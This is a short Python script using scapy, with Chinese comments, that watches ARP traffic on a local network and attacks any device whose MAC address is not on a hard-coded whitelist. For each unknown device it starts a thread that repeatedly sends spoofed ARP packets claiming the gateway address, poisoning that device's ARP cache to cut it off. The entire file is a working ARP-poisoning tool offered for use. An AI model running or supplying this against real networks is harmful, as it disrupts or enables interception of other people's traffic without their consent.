sniff unauthorized client and attack with ARP poisoning.

sniff_and_attack.py

#! /usr/bin/env python
from scapy.all import *
from scapy.layers.l2 import ARP, Ether
import time
import threading
# 合并通知
notic_inter = 600
# 攻击持续时间（秒）
attack_reset = 30

watchlist = dict()

# MAC白名单
whitelist = set(['84:5d:d7:ff:ff:ff',
                 'ac:bc:32:ff:ff:ff',
                 'a6:8e:80:ff:ff:ff',
                 '18:f6:43:ff:ff:ff',
                 '8e:09:d6:ff:ff:ff',
                 '0a:42:ef:ff:ff:ff'])

# 攻击函数 ref: https://scapy.readthedocs.io/en/latest/usage.html?highlight=arp#arp-cache-poisoning
def arp_cache_poisoning(clientMAC, clientIP):
    # 设备消失一段时间后停止攻击
    while time.time() - watchlist.get(clientMAC) < attack_reset:
        sendp(Ether(dst=clientMAC) / ARP(op="who-has", psrc='172.17.1.1', pdst=clientIP),
             inter=1, verbose=0)

# sniff的回调函数
def arp_monitor_callback(pkt):
    if ARP in pkt and pkt[ARP].op in (1, 2) and pkt[ARP].hwsrc not in whitelist: #who-has or is-at
        t = time.time()
        last_seen = watchlist.get(pkt[ARP].hwsrc, 0)
        watchlist[pkt[ARP].hwsrc] = t

        # 距离上次短线不足一个攻击周期，不启动新攻击
        if t - last_seen > attack_reset:
            new_thread = threading.Thread(target=arp_cache_poisoning, name=f'attack_{pkt[ARP].hwsrc}', args=(pkt[ARP].hwsrc, pkt[ARP].psrc))
            new_thread.start()

        # 十分钟以内只通知一次
        if t - last_seen > notic_inter:
            local_t = time.localtime(time.time())
            return pkt.sprintf(f"{local_t.tm_hour:02}:{local_t.tm_min:02}:{local_t.tm_sec:02} %ARP.hwsrc% %ARP.psrc%")

print("LINK START...")
# ref: https://scapy.readthedocs.io/en/latest/usage.html#simplistic-arp-monitor
sniff(prn=arp_monitor_callback, filter="arp", store=0)